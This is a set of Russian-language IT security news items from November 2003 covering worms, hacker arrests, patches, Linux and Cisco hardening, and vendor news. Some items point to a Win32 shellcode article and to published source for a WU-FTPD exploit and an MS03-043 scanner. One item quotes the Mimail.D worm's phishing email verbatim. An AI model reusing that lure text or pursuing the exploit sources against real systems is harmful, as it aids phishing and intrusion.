привлечено более 18 тысяч человек, передает ИТАР-ТАСС. Госдумой уже приняты изменения в российское законодательство, ужесточающие ответственность за производство и распространение пиратской продукции. В частности, определено наказание не только за распространение, но и за хранение пиратской продукции с целью последующей продажи - за это предусмотрено наказание на срок лишения свободы до 5 лет. Кроме того, определен ущерб (100 МРОТ) за нарушение авторских прав, по которому наступает уголовное наказание. Источник - http://www.crime-research.ru
7/11/2003 20:18 Borland выпустил новую версию Enterprise Studio for Java.
В ходе празднования своей 20-й годовщины на конференции 2003 Borland Conference корпорация Borland объявила о выпуске комплексного решения для управления жизненным циклом программных продуктов Borland Enterprise Studio 7 for Java. Новая унифицированная среда разработки (Unified Development Environment, UDE) от Borland реализует централизованное управление всеми аспектами разработки, что должно привести к повышению производительности труда. В состав Borland Enterprise Studio 7 for Java входят 3 продукта: Borland Together, Borland Optimizeit Suite, Borland Enterprise Studio 7. Подробности - http://www.cnews.ru/newsline/index.shtml?2003/11/06/151375
7/11/2003 19:08 Статья "Методы эксплоитинга в Win32".
Cайт securitylab в очередной раз порадовал статьёй, которая описывает очередной вариант написания шеллкода для использования уязвимости в win32-ОС. Cтатья написана Crazy Einstein (respect). думается, будет небезынтересна многочиленным посетителям нашего сайта (равно как и посетителям securitylab). Cтатья - http://www.securitylab.ru/41125.html
7/11/2003 18:35 Новая статья: Процессы и нити в ОС Linux.
Очень подробная статья о процессах и нитях, призвана заменить старую краткую статью на нашем сайте под названием "Процессы в Unix". Ознакомиться: http://www.uinc.ru/articles/34/index.shtml
6/11/2003 19:48 Восемь шагов для защиты маршрутизатора Cisco.
На сайте opennet.ru опубликована ссылка на руководство, представленное в PDF-формате, которое описывает основные меры по защите маршрутизаторов, построенных на платформе CISCO (на базе IOS, соответственно). Эти шаги, если вкратце, включают в себя: жесткий контроль доступа через ACL; telnet/ssh доступ только с доверительных хостов; блокирование попыток спуффинга и пакетов из Intranet подсетей; ограничение SNMP (секретное имя community и доступ только с хостов мониторинга); шифрование паролей; выключение неиспользуемых сетевых сервисов; ведение подробных логов; включение спец. опций (no ip source-routing, no ip proxy-arp, no ip redirects, no ip mroute-cache, no cdp run, no ip directed-broadcast). Статья - http://www.ossec.net/docs/cisco/8Steps-secure-Cisco.pdf
6/11/2003 19:02 Обнаружена попытка вставки закладки в ядро Linux.
Как сообщает bugtraq.ru, Ларри Маквой сообщил о попытке изменения нескольких строчек кода в файле 'kernel/exit.c' на CVS-зеркале тестовой версии ядра 2.6. Модификация, очевидно, проводилась в целях вставки закладки для последующего получения администраторских прав на использующих данный код системах. Отмечается, что если бы это изменение осталось незамеченным, то отлавливать бы его пришлось очень долго. Подробности - http://kerneltrap.org/node/view/1584
6/11/2003 18:38 И ещё о dni.ru.
Глава компании GooDoo, издающей «Дни.ру», Константин Рыков (aka Джейсон Форис) сказал по поводу изменённого дизайна заглавной страницы (см. нашу вчерашнюю новость) следующее: «Агенты поменяли матрицу «Дней.ру». Редакция в шоке. Мы ждем, когда все решиться». Что за агенты – остаётся непонятным. В принципе причиной можно было бы считать взлом сервера веб-ресурса. Однако складывается парадоксальная ситуация. Описанную картину можно лицезреть только на заглавной странице, тогда как внутренние разделы открываются нормально. Получается, что хакер просто подменил файл «index.html», который должен загружаться при заходе на http://www.dni.ru. В новом «index.html» содержится только написанный на JavaScript сценарий, рисующий происходящее сейчас «безобразие». Существует другая версия происходящего. Как стало известно нашей редакции из анонимных источников, завтра «Дни.ру» меняет свой дизайн. И умело созданный ажиотаж должен привлечь огромное внимание к обновлению, как сотрудников ИТ-изданий, так и обычных пользователей. Источник - http://www.runet.ru
6/11/2003 18:22 Борцы с пиратством напугали американцев.
Более миллиона американских семей стерли в августе все цифровые музыкальные файлы с жестких дисков своих компьютеров, что может быть знаком того, что борьба музыкальной промышленности с пиратством все-таки имеет какое-то действие, сообщила в среду исследовательская компания NPD Group. NPD считает, что тенденция эта вызвана антипиратской кампанией, развернутой Ассоциацией звукозаписывающей промышленности Америки (RIAA), и полагает, что пропаганда и угрозы RIAA заставят еще больше пользователей удалять файлы. В августе 2003 года 1,4 миллиона семей стерли все музыкальные файлы из памяти своих ПК, в то время как в мае так поступили всего 600 тыс. человек, сообщила NPD. No comment. Чужая страна, странные нравы... Источник - http://www.cnews.ru
6/11/2003 17:47 Telia блокирует спамеров и зараженные вирусами компьютеры.
Телекоммуникационный оператор TeliaSonera вступил на тропу войны со спамерами, а также авторами вирусных и троянских программ. С недавнего времени в сети Telia началась блокировка компьютеров, рассылающих много количество спама и писем, содержащих вирусы и другие вредоносные программы. При этом блокируются не только почтовые серверы, активно используемые спамерами, но и любые компьютеры, задействованные для рассылок рекламы или вредоносных программ. То есть в число блокируемых попадают компьютеры, пораженные троянами, обеспечивающими массовые рассылки. Владельцы таких компьютеров зачастую даже не подозревают о том, что их машины захвачены спамерами. В результате, заблокированными могут оказаться не только нежелательные послания, но и обычный интернет-трафик. На столь радикальные меры в TeliaSonera пошли из-за непрерывно растущего числа жалоб пользователей. Если год назад в компании получали порядка 30 жалоб на спамеров в день, то нынешней весной число жалоб выросло до 300, а осенью - до 3000 в день. Источник - http://www.compulenta.ru
6/11/2003 17:26 Электронный журнал "Спамтест" No. 23.
Вышел очередной номер журнала "Спамтест" номер 23. Как обычно, номер начинается новостями из мира спама (можно пропустить - :)). Но дальше, наконец-то, начинается полезная информация. Первая часть - "Принципы и технические методы работы с незапрашиваемой корреспонденцией на Яндексе" - авторы: Илья Сегалович, Дмитрий Тейблюм, Александр Дилевский. Вторая, не менее интересная, имееет большую практическую направленность для конкретного пользователя электронной почты. В ней от имени White Russian Bear описаны основные настройки почтового клиента The Bat для настройки фильтрации спама. Надо признать - довольно эффективные настройки. Попутно хотелось бы обратить внимание посетителей (опять) на программу SpamPal. С прикрученным плагином Bayesin (если его УМНО настроить) фильтрует почту очень даже эффективно. Журнал - http://www.kaspersky.ru/news.html?id=143937135
6/11/2003 16:36 У сотовых телефонов Nokia будут новые адреса.
В среду производитель мобильных трубок объявил, что в будущем году его телефоны перейдут на интернет-протокол нового поколения — Internet Protocol version 6 (IPv6), который значительно расширяет количество уникальных адресов для подключения устройств к Сети. Сейчас Nokia снабжает операторов мобильных сетей прототипами новых телефонов исключительно в целях тестирования. Ожидается, что трубки, использующие как новую, так и существующую IP-систему, поступят в широкую продажу в будущем году. Nokia и производители оборудования связи утверждают, что существующая система IPv4 близка к исчерпанию интернет-адресов. «Nokia осознает насущную потребность в технологии IPv6», — сказал вице-президент Nokia Адам Смит. Вероятно, компания предназначает свои IPv6-телефоны в первую очередь для сервис-провайдеров азиатских стран, насыщенных сотовыми телефонами: им, по мнению ряда экспертов, грозит дефицит доступных IP-адресов. Некоторые крупные операторы, включая японского гиганта NTT и Asia Netcom, уже используют новый стандарт в своих сетях. В других регионах спрос на IPv6-продукты, которые продает большинство производителей сетевого оборудования, невелик. Противники IPv6 утверждают, что за пределами Азии опасность истощения существующей схемы адресов не наступит по крайней мере в ближайшие два десятилетия — а то и никогда. Источник - http://www.zdnet.ru
6/11/2003 16:03 В Office обнаружена «критическая ошибка».
Microsoft выпустила первый важный патч для новой версии своего ПО Office, исправив ошибку, которая могла приводить к потере выполненной работы. Как сказано в бюллетене Microsoft, «критический апдейт», вышедший во вторник вечером, относится к трем из четырех основных приложений Office 2003 — редактору текста Word, программе для подготовки презентаций PowerPoint и электронной таблице Excel. Проблема проявляется, когда документ, созданный в одном из этих приложений, открывается в предыдущей версии Office. Если этот документ содержит элементы графики, разработанные с применением инструмента OfficeArt, прежняя версия Office неправильно интерпретирует эту часть документа и при сохранении добавит в файл неверные данные. Попытка снова открыть файл в том приложении Office 2003, в котором он был создан, может привести к искажению документа, потере содержимого и к другим ошибкам. Microsoft с большой помпой выпустила Office 2003 в конце прошлого месяца. В отличие от предыдущих обновлений офисного ПО, которые были сосредоточены на новых инструментах и функциях, главные новшества Office 2003 скрыты в недрах продукта. Microsoft утверждает, что поддержка основанных на XML корпоративных систем и веб-сервисов, а также новые средства управления цифровыми правами превращает Office в широкую платформу обмена бизнес-информацией. Источник - http://support.microsoft.com/?kbid=828041
5/11/2003 18:38 Nokia использует анти-вирусный механизм компании Sophos для обеспечения безопасности в сервисах доставки сообщений .
Sophos и такие разработчики технологий защиты от вирусов и спама, как Kaspersky Labs, Postini, InDefense and Zix, предоставили систему по обеспечению безопасности сообщений интегрированную в устройство компании Nokia. Система способна блокировать спам, защищать от вирусов и проверять содержание более чем 150 000 сообщений в час. Nokia Message Protector v1/3/1 c анти-вирусным механизмом от Sophos будет доступен уже в этом месяце. Источник - http://www.mobile-revie.com
5/11/2003 16:03 Cтатья "Интернет-кафе как собственный бизнес".
Возможно, наш сайт посещают люди, которые хотят организовать (или уже организовали) Интернет-кафе. На сайте независмого обзора провайдеров опубликована статья, автор которой по сути дает готовый рецепт успеха в области организации интернет-кафе и компьютерных клубов. Описываются как теоретические основы организации такого рода бизнеса, так и практические рекомендации. Кто знает, возможно, прочтение этой статьи наведет Вас на мысль об организации собственного компьютерного клуба? Статья - http://www.provider.net.ru/article.28.php
5/11/2003 17:55 Экс-хакеры не разбираются в компьютерной безопасности.
Делегаты конференции RSA Security Conference в Амстердаме поставили под сомнение способности большинства хакеров. Мастерство хорошего взломщика совершенно не соответствует навыкам стоящего специалиста по безопасности ИТ. «Распространилось мнение, что если вы можете сломать систему, то, непременно знаете, как ее защитить. Это полная ерунда! За 4 часа я могу даже обезьяну обучить хакерской науке», - утверждает Айра Уинклер, легендарный специалист по разработке стратегий безопасности компании Hewlett Packard. Тем не менее, в свои 20-30 лет хакеры представляются профессионалами в области информационных технологий. Они полагают, что компании слишком поздно поймут, что кибер-браконьеры не могут успешно справится с обязанностями кибер-егерей. «Почему вы берете на работу взломщиков с криминальным прошлым, среди которых неудачники, которых поймали?», - спрашивал Тони Нит, офицер Национального подразделения по борьбе с hi-tech преступлениями. - «Например, если банк захочет нанять охранника, то вряд ли он станет пытаться искать бывшего грабителя для защиты собственной системы! Компании должны быть уверены в том, что они знают подноготную своего персонала». Источник - http://www.runet.ru
5/11/2003 17:22 Проблемы в утилите шифрования MacOS X Panther.
В новейшей операционной системе MacOS 10.3 Panther компании Apple обнаружена новая недоработка. Не прошло и недели с момента обнаружения проблем с подключением внешних дисковых накопителей через интерфейс FireWire 800 (их использование грозит потерей данных), как стало известно о проблемах со встроенной в Panther системой шифрования файлов FileVault. FileVault позволяет зашифровать все файлы, находящиеся в домашней директории пользователя, используя алгоритм AES с длиной ключа в 128 бит. При работе с FileVault файлы шифруются и расшифруются "на лету", что позволяет работать точно так же, как и при выключенном шифровании. FileVault может оказаться полезным решением для многих пользователей. В частности, владельцы ноутбуков могут защищать с ее помощью данные, чтобы те не попали в чужие руки при краже портативного компьютера. При включении FileVault необходимо ввести два пароля, после чего текущий пользователь должен выйти из системы. Затем MacOS шифрует всю информацию в папке и перезагружается. Перед перезагрузкой система предлагает пользователю восстановить потерянные фрагменты дискового пространства, и если пользователь согласится на это, могут возникнуть проблемы. В некоторых случаях после восстановления потерянных участков и перезагрузки могут быть сброшены или удалены настройки ряда программ, таких как браузер Safari, Address Book, Mail и менеджер паролей Keychain. В случае Keychain пользователь также теряет возможность сохранения и автоматического ввода паролей, что неудобно и может привести к нестабильной работе системы. Подробности - http://www.compulenta.ru/2003/11/5/43088/
5/11/2003 16:46 Продолжает распространяться червь Mimail.C, обнаружена новая версия - Mimail.D.
Про червь Mimail.C мы уже сообщали. Компания Panda Software сообщает о появлении новой разновидности - Mimail.D. Наиболее активно червь поражает системы пользователей в Испании, Уругвае, Чили, Боливии и Венесуэле. Поведение Mimail.D. очень похоже на первый вариант W32/Mimail. Червь распространяется по электронной почте в сообщении со следующими параметрами: Отправитель: admin@%domain% (%domain% - is the domain of the user’s e-mail address); Тема: Your account xxxxxxx (xxxxxxx is a group of random lower-case letters); Текст сообщения: "Hello there, I would like to inform you about important information regarding your email address. This email address will be expiring. Please read attachment for details.Best regards, Administrator.xxxxxxxx". Вложенные файлы: message.zip. Кроме того, сообщение имеет атрибут «высокая важность». Mimail.D ищет электронные адреса для рассылки своих копий при помощи собственного SMTP механизма. По причине продолжающегося распространения Mimail.C и возможности увеличения числа заражений этим червем или его новой версией, компания Panda Software советует пользователям очень осторожно обращаться со всеми полученными сообщениями и обновить свои антивирусные продукты немедленно. Источник - http://www.viruslab.ru
5/11/2003 16:40 Дефейс dni.ru или шутка админа?
На сайт dni.ru нам указал einstein. Рекомендуем посмотреть. :) Непонятно только, что бы это значило? Такое впечатление, что мировая премьера Матрицы не обошла Россию .... Это похоже на дефейс известного новостного сайта (либо шутку админа?). Cмотреть - http://www.dni.ru
5/11/2003 16:11 Novell нашла опору в Linux.
Во вторник Novell значительно расширила свое присутствие на рынке Linux, объявив о планах приобретения SuSE Linux за 210 млн долл. Компания сообщила также, что IBM инвестирует в Novell 50 млн долл., что составляет примерно 2% от капитализации производителя ПО. Приобретению SuSE Linux, крупного дистрибьютора операционной системы Linux, предшествовала покупка в августе другого поставщика ПО open-source, Ximian, а также обещание Novell предложить ряд сетевых сервисов на платформе Linux. Эти шаги проясняют долгосрочные перспективы Novell, которая в последние три года балансирует на грани рентабельности. Вместо того, чтобы держаться за относительно узкую клиентскую базу пользователей операционной системы NetWare или ПО коллективной работы GroupWise, Novell хочет оседлать нарастающую волну популярности Linux среди корпораций. Источник - http://www.zdnet.ru
5/11/2003 15:58 Microsoft назначит премии за головы авторов вирусов.
Как стало известно CNET News.com, в среду Microsoft объявит о назначении двух премий по 250 тыс. долл. за информацию, которая приведет к аресту людей, выпустивших червя MSBlast и вирус SoBig. Источники и в секьюрити-индустрии, и в правоохранительных органах подтвердили, что премии будут анонсированы на совместной пресс-конференции Microsoft с ФБР, US Secret Service и Интерполом, запланированной на 10 утра (EST) среды. Компания впервые предлагает деньги за информацию, которая поможет найти киберпреступников. «Это новый подход. Я не думаю, что кто-нибудь поступал так раньше», — сказал специалист по безопасности из фирмы @stake Крис Уайзопал, который не знал о премиях и сомневается, что они сработают. Премии станут очередной попыткой Microsoft и правоохранительных органов выйти на людей, ответственных за заражение тысяч компьютеров в августе и сентябре. Министерство юстиции США, ФБР и Microsoft уже объявляли об аресте двух человек, подозреваемых в модификации и повторном распространении вариантов червя MSBlast. Атаки были настолько серьезными, что повлияли на финансовые результаты Microsoft и помогли секьюрити-фирмам нарастить прибыль. По данным Symantec, MSBlast, известный также под именами Blaster и Lovsan, заразил 1,2 млн компьютеров, пробираясь в них через пробел в защите операционной системы Windows, патч для которого Microsoft выпустила месяцем ранее. Вирус Sobig.F распространился по email 19 августа, превращая компьютеры пользователей в системы для рассылки спама. Вариант червя MSBlast, MSBlast.D, был нацелен на защиту машин от оригинальной вредоносной программы, но оказался столь агрессивным, что производимый им трафик приводил к перебоям в работе сетей. Подробности - http://news.zdnet.co.uk/0,39020330,39117616,00.htm
5/11/2003 15:25 Борьба со спамом оказалась выгодным бизнесом.
Согласно выводам аналитиков, которые приводит в среду сайт CNN.com, индустрия программного обеспечения, предназначенного для борьбы со спамом, стремительно развивается и может стать одним наиболее доходных видов высокотехнологичного бизнеса. Эксперты консалтинговой фирмы Radicati Group пришли к выводу, что в этом году фирмы-производители антиспамерского программного обеспечения заработали 600 миллионов долларов. К 2007 году, по подсчетам экспертов, совокупные доходы этой отрасли могут составить 2 миллиарда долларов. Подсчеты аналитиков свидетельствуют, что в настоящее время спам составляет более половины всего объема мировой электронной почты и, по подсчетам компании Ferris Research, которые приводит издание TechWeb.com, в 2003 году убытки от спама только для американских компаний составили около 10 миллиардов долларов. Следовательно, компании, чтобы избежать убытков, будут с энтузиазмом вкладывать средства в покупку средств блокировки спама. Подробности - http://www.cnn.com/2003/TECH/internet/11/04/spam.killer/index.html
4/11/2003 12:22 Red Hat сворачивает выпуск и поддержку "обычных" дистрибутивов.
Компания Red Hat разослала своим клиентам письмо, в котором сообщается о скором прекращении какой-либо поддержки Red Hat Linux 7.1, 7.2, 7.3 и 8.0 31 декабря 2003 года, а Red Hat Linux 9 — 30, 2004 года. Больше дистрибутивов под маркой Red Hat Linux выходить не будет в принципе. На смену пришёл корпоративный дистрибутив Red Hat Enterprise Linux, установка которого будет стоить немалых денег. Enterprise Linux — сугубо коммерческий проект. Между тем, в природе остаётся открытый и бесплатный дистрибутив Fedora, создаваемый наиболее компетентными пользователями Linux при моральной и материальной поддержке Red Hat. Ну и, кроме того, существует масса других — пока ещё бесплатных — дистрибутивов. Вот такие вот грустные новости, однако... Подробности - http://www.newsforge.com/article.pl?sid=03/11/03/1657205
4/11/2003 12:08 Новый пакет для управления сетями на российском рынке.
Компания "Вимком Дистрибуция" объявила о начале продаж пакета SNMPc Network Manager производства Castle Rock Computing. Этот пакет дополнит ассортимент предлагаемых "Вимком" решений для управления ИТ-инфраструктурой, который в настоящее время представлен пакетами Open View компании Hewlett-Packard, Mega Vision компании MRV Communications и OmniVista компании Alcatel. SNMPc Network Manager имеет распределенную архитектуру, поддерживает протокол Secure SNMP версии 3, удаленное управление, в том числе при помощи технологий Java, отправку сообщений о сбоях на адрес электронной почты или пейджер, имеет систему визуального представления сетевого оборудования различных производителей. Продукт компании Castle Rock Computing может быть использован в сетях, построенных на оборудовании разных производителей. Цена пакета версии Workgroup составит 1194 долл., версии Enterprise - 3540 долл. Источник - http://www.osp.ru
4/11/2003 10:42 Сканер уязвимости MS03-043.
Выпущен исходник сканера уязвимости в ОС NT/XP/2K/2003, описанной в бюллетене по безопасности от Microsoft MS03-043. Напомним, что бюллетень описывает наличие уязвимости в сервисе Messenger, которая позволяет выполнить произвольный код в уязвимой системе. Исходник написан на Си для *nix-подобных ОС. Автор - некий Crowley из команды kiwi-hacker.net. Попутно заметим, что титульная страничка сйта команды написана довольно безграмотно, поскольку ни одна ссылка не работает. Автор грузит линки через JavaScript-функцию LoadPage, которая проверяет версию браузера, однако данная проверка не работает. В результате для просмотра линков реуомендуется вводить прямую ссылку в окне браузера. JFYI ;) Сканер - http://www.kiwi-hacker.net/source/ms03-043scanner.c
4/11/2003 10:09 Hewlett-Packard использует вирусные технологии для защиты от вирусов.
Вирусные программные технологии могут быть использованы для обеспечения безопасности локальных сетей. К такому выводу пришли специалисты компании Hewlett-Packard, занимающиеся созданием кодов с вирусными элементами, сообщает сайт ComputerWeekly. Новая разработка Hewlett-Packard позволит идентифицировать зараженные машины и своевременно отключать их от сети. По словам представителей компании, они уже использовали подобный подход за два дня до начала эпидемии червя LoveSan. Программа, созданная в бристольской лаборатории Hewlett-Packard, помогла создать эффективную защиту от масштабной вирусной эпидемии. Несмотря на то, что новая технология находится только на начальном этапе разработки, в Hewlett-Packard ее считают надежным способом преодоления трудностей, связанных с установкой заплаток на большое количество компьютеров. Особенно актуальной защита HP окажется в условиях дефицита времени. Источник - http://www.viruslist.ru
3/11/2003 19:09 Защита сервера DNS.
На сайте LinuxRSP.ru опубликована очень интересная и полезная статья Дениса Колисниченко "Защита сервера DNS", которая, думается, будет полезна для ознакомления системным администраторам. Конфигурируя сервер, администраторы часто забывают правильно настроить службу DNS. После такой настройки служба DNS работает корректно: IP-адреса разрешаются в имена компьютеров, а символьные имена без проблем преобразуются в IP-адреса. На этом большинство администраторов и останавливаются: главное, чтобы работало. Работать-то оно работает, но неправильно настроенный сервер DNS может стать огромной дырой в системе безопасности компании. Одно дело, когда сервер DNS обслуживает локальную сеть без выхода в Интернет: даже, если кто-то и попытается "взломать" сервер, то вычислить "хакера" довольно просто. А вот, если сеть предприятия подключена к Интернет, то узнать, кто же пытался взломать (или взломал) вашу сеть довольно сложно. Ущерб от взлома может обойтись компании в кругленькую сумму. Статья - http://www.linuxrsp.ru/artic/dns-sec.html
3/11/2003 18:51 Очередной Live-CD дистрибутив Linux - Devil-Linux 1.0.
В канун буржуйского праздника Halloween был выпущен дистрибутив Devil-Linux 1.0. Дистрибутив характерен тем, что загружается полностью с загрузочного CDROM (и даже USB-устройства) и предназначен для построения довольно защищённого файрволла. Различные параметры настройки (которые неизбежно нужны) можно сохранить на флоппике и USB-флэшке. Помимо самого файрволла версия 1.0 может быть использована в качестве сервера различных приложений. Что же содержит этот дистрибутив? Ядро 2.4.22 с FreeS/WAN и Netfilter-патчами, GRSecurity для обеспечения безопасности самого ядра, практически весь софт скомпилирован GCC с включённой защитой от срыва стека (переполнения буфера), поддержка 2 или 3 сетевых карт в сетевых скриптах по умолчанию, включение в дистрибутив различного ПО для построения VPN-сетей - FreeS/WAN, OpenVPN и др, поддержка SMTP / POP3 / IMAP4 / SPAM Filter / Virus Scanner. В состав дистрибутива также включён Lotus Notes 5/6 Server в chroot-среде и скомпилированный DNS-сервер в аналогичной среде. Пока мы писали эту новость, на самом сайте была обнаружена версия 1.0.1. ;) Подробности - http://www.devil-linux.org/devil-linux-1.0-press-release.htm
3/11/2003 18:32 В Symantec'е перемудрили с активацией.
Как сообщает bugtraq.ru, компания Symantec признала, что некоторые пользователи Norton Antivirus 2004 вынуждены вводить код активации после каждой перезагрузки системы, а через некоторое время просто получают сообщение о завершении пробного периода. Причины такого поведения пока неизвестны, для пользователей, испытывающих подобные проблемы, выпущена утилита Symantec Automated Support Assistant, собирающая информацию о системе для последующего анализа. Вся эта затея с активацией, которая некоторое время воспринималась софтверными фирмами как панацея против пиратства, в последнее время показала себя не слишком работоспособной - практически для всех популярных пакетов, включая NAV 2004, распространяются генераторы активационных ключей, а для некоторых пакетов обнаружены серийные номера, не требующие активации. Подробности - http://www.computerworld.com/securitytopics/security...
3/11/2003 18:20 Обзор вирусной активности октября.
"Лаборатория Касперского" опубликовала обзор вирусной активности прошедшего месяца. Согласно этому аналитическому документу, наибольшее количество заражений зафиксировано от I-Worm.Swen - 70,94% (повышение на одно место), второе (со значительным отрывом) - I-Worm.Tanatos - 1.13% (повышение на 4 места), третье - недано появившийся - I-Worm.Mimail - 1,07%. Всё остальные вредители не набрали одного процента. Если сравнивать общую тенденцию, то сетевые черви занимают 90,76% от общего числа вредносных программ, троянские программы - 6,46%, вирусы - 2,77%. Подводя общую черту, "Лаборатория" делает следующие выводы: "Прежде всего, список впервые покинули сетевые черви "Klez" и "Lentin", которые не покидали вирусный "хит-парад" с ноября 2001 и марта 2002 гг. соответственно. Серьезно пошатнулись позиции "Sobig", лидировавшего на протяжении последних нескольких месяцев: он спустился с 1 на 8 место. В то же время верхнюю позицию рейтинга занял новичок - червь "Swen", появившийся в интернете всего полтора месяца назад, в середине сентября. Интересно отметить, что "Swen" буквально монополизировал лидерство в двадцатке - на его долю пришлось более 70% всех инцидентов, зарегистрированных за этот период. В то же время, его ближайшие преследователи, черви "Tanatos" и "Mimail" вызвали немногим больше 1% инцидентов каждый. Другой неожиданный момент октябрьской вирусной статистики - значительный рост количества и разнообразия "троянцев". Во-первых, в двадцатку попали 9 вредоносных программ этого типа, которые в совокупности превзошли долю компьютерных вирусов почти в 3 раза (6,46% против 2,77%). Однако на этом фоне свое лидерство сохранили сетевые черви, на совести которых более 90% всех зарегистрированных инцидентов. Источник - http://www.kaspersky.ru
3/11/2003 18:13 Новый червь распространяет Zip-файл.
И ещё некоторые подробности о вирусе Mimail.c от ZDNET. Червь Mimail.c, вариант известного вредителя, который получил умеренное распространение, маскируясь под сообщение от ИТ-персонала компании, впервые был обнаружен в четверг вечером и сумел заразить несколько ПК. Крейг Шмугар, инженер-вирусолог McAfee Antivirus Emergency Response Team, считает, что пик эпидемии пришелся на середину дня в пятницу. «Похоже, худшее уже позади», — сказал он. Согласно описанию McAfee, Mimail.c распространяется по электронной почте, появляясь в почтовых ящиках в виде сообщения со следующим текстом в строке subject: «our private photos». В теле сообщения пользователю обещают разоблачительные фотографии, если тот откроет вложенный файл в формате Zip-архива. При открытии файла червь пытается распространяться, отправляя сообщения по адресам e-mail, найденным в зараженном компьютере. Кроме того, червь пытается запустить атаку denial-of-service, отправляя большой объем «мусора» по веб-адресам, относящимся к сайту любителей игр DarkProfits, который стал предметом постоянных email-мистификаций. Подробности - http://zdnet.com.com/2100-1105_2-5100741.html
3/11/2003 17:40 Бразильский хакер искал славу в Японии ради престижной работы.
Японская полиция арестовала 17-летнего гражданина Бразилии, проживающего в префектуре Тотиги, по подозрению в нарушении закона о несанкционированном доступе к данным. Арестованный бразилец является членом хакерской группы, ответственной за взлом приблизительно 1000 сайтов в 33 странах мира, сообщает издание The Daily Yomiuri. По некоторым сведениям, юный хакер объяснил свои преступные деяния стремлением пробудить интерес к собственной персоне среди представителей крупных компаний и тем самым обеспечить себе престижное рабочее место. Используя свой компьютер, 10 июля этого года бразилец взломал сеть больницы университета Киото и оставил на сайте исследовательского центра головного мозга надпись s3r14l k1ll3r, которую можно трактовать как serial killer ("серийный убийца"). Помимо описанного деяния, хакеру инкриминируется взлом сайтов частной школы и фирмы по обслуживанию компьютеров. Организация, в состав которой входил арестованный бразилец, называется "Киберлорды" (CyberLords). Общее число ее членов - восемь человек. Все они проживают в США и Бразилии и познакомились друг с другом на сайте, используемом для общения только хакерами. В марте этого года "Киберлорды" организовали атаку на 60 сайтов в Республике Корея. Южнокорейские полицейские сумели установить, что один из участников кибернападения проживает в Японии, и обратились за помощью к коллегам. Источник - http://www.viruslist.com
3/11/2003 17:35 NEC защищает своих клиентов от вирусов.
Один из крупнейших японских производителей персональных компьютеров, японская компания NEC решила позаботиться о покупателях своих ПК и оградить их от проблем с компьютерными вирусами и несанкционированным доступом к данным. С начала ноября 2003 года на все компьютеры этой компании предустанавливается специальное программное обеспечение, следящее за установками безопасности в браузере Internet Explorer и сигнализирующее при изменениях, вносимых в настройки рекомендуемого среднего уровня безопасности. По словам пресс-секретаря NEC Аки Ота, это позволяет предотвратить возможное снижение уровня безопасности без ведома пользователя, что стараются сделать компьютерные вирусы. Кроме того, с середины ноября текущего года компании NEC будет напоминать всем своим клиентам о необходимости установки патчей для операционной системы: перед установкой "заплаток" пользователь компьютера получит соответствующее уведомление, а сам процесс загрузки и установки будет проходить в автоматическом режиме. Источник - http://www.compulenta.ru
3/11/2003 17:23 Израильский хакер взломал сайт "Моссада", чтобы защитить свои персональные данные
Интернет-сайт "Моссада", созданный для набора новых сотрудников, был взломан 23-летним израильтянином, сообщает сайт ежедневной газеты Haaretz. Спецслужбы провели арест подозреваемого в Иерусалиме. В настоящее время ему уже предъявлены обвинения. Администрация Ариэля Шарона и Минюст отказываются давать какие-либо комментарии. Между тем, до сих пор неизвестны точное время, когда был взломан сайт, имя хакера и предъявленные ему обвинения. По данным газеты, молодой человек проник в систему с единственной целью убедиться, что информация из электронной анкеты, которую он заполнил, достаточно защищена и не попадет в чужие руки. Однако получив доступ к внутренним ресурсам сайта, он не смог извлечь из них ничего осмысленного. Сервер "Моссада" подвергается сотням атак ежедневно, при этом большинство из них проводятся из заграницы. В Израиле разведслужба уже была обвинена в том, что вместо того чтобы усовершенствовать защиту сайта, она довела дело до суда. Источник - http://www.lenta.ru
2/11/2003 13:25 Эксплоит уязвимости WU-FTPD.
Angelo Rosiello опубликовал исходный код эксплоита уязвимости, недавно обнаруженной в FTP-сервере WU-FTPD (версия 2.6.2). На этот раз исходник написан на Си (предыдущий был на Перле). Исходник - http://www.securityfocus.com/archive/1/343033/2003-10-30/2003-11-05/0
2/11/2003 13:13 Установка и настройка маршрутизатора удаленного филиала компании на основе FreeBSD.
На сайте npo.businessgrad.ru опубликована интересная статья "Установка и настройка маршрутизатора удаленного филиала компании на основе FreeBSD", в которой пошагово описывается процесс установки и настройки машрутизатора, имеющего защищенный с помощью IPsec туннель с головным офисом (маршрутизатор Cisco) и имеющего выход в Интернет через собственного провайдера. В качестве базовой ОС (как понятно из названия) взята FreeBSD версии 4.8. Cтатья - http://npo.businessgrad.ru/~alexey/freebsd.html
2/11/2003 12:14 Интервью с Ильёй Медведовским.
На сайте xakep.ru опубликовано интервью с Ильёй Медведовским. Если кто не в курсе - он один из авторов бестселлеров "Атака через/из/на Интернет". Работает директором консалтинговой секьюрити компании Digital Security. Кстати, в той же статье ссылка на интервью с вторым автором - Дмитрием Леоновым, ака dl. Интервью - http://www.xakep.ru/post/20258/default.htm
2/11/2003 11:59 Компьютерный взломщик из Киева взят с поличным.
Сотрудникам отдела по борьбе с экономическими преступлениями подмосковного города Сергиев Посад удалось на днях задержать хакера, укравшего уникальную компьютерную программу. Жулик-компьютерщик вовсю торговал украденной интеллектуальной собственностью, пока не был схвачен с поличным милицией. В УВД Сергиева Посада сообщили, что компьютерную программу для дизайна знаменитой сергиево-посадской вышивки разработал некоторое время назад местный программист, который трудился над ней несколько лет и недавно запатентовал новинку. Программа пользовалась большим спросом на текстильных фабриках, и за ее использование покупатели платили немалые деньги - 2000 долларов. Каково же было удивление автора, когда он наткнулся в Интернете на объявление о продаже своей продукции. На столичном черном рынке компьютерных технологий появилась копия этой дефицитной программы всего за 100 долларов. Как выяснилось впоследствии, 22-летний талантливый компьютерщик из Киева приобрел оригинал программы и ухитрился ее скопировать, взломав цифровую защиту на диске. Сотрудникам подмосковной милиции требовалось взять мошенника с поличным, и они вышли на воришку по тому же самому объявлению о продаже в Интернете. На пустынном участке автотрассы неподалеку от Сергиева Посада была назначена встреча с продавцом, сделка состоялась, и оперативники рассчитались с молодым парнем меченой стодолларовой купюрой. Взятый с поличным хакер рассказал в милиции, что программу вместе с ним взламывал его киевский приятель, и сейчас подельник компьютерного воришки объявлен в международный розыск. Источник - http://www.crime-research.ru
2/11/2003 11:15 Бета-тестирование Антивируса Касперского® для ISA Server 5.0.
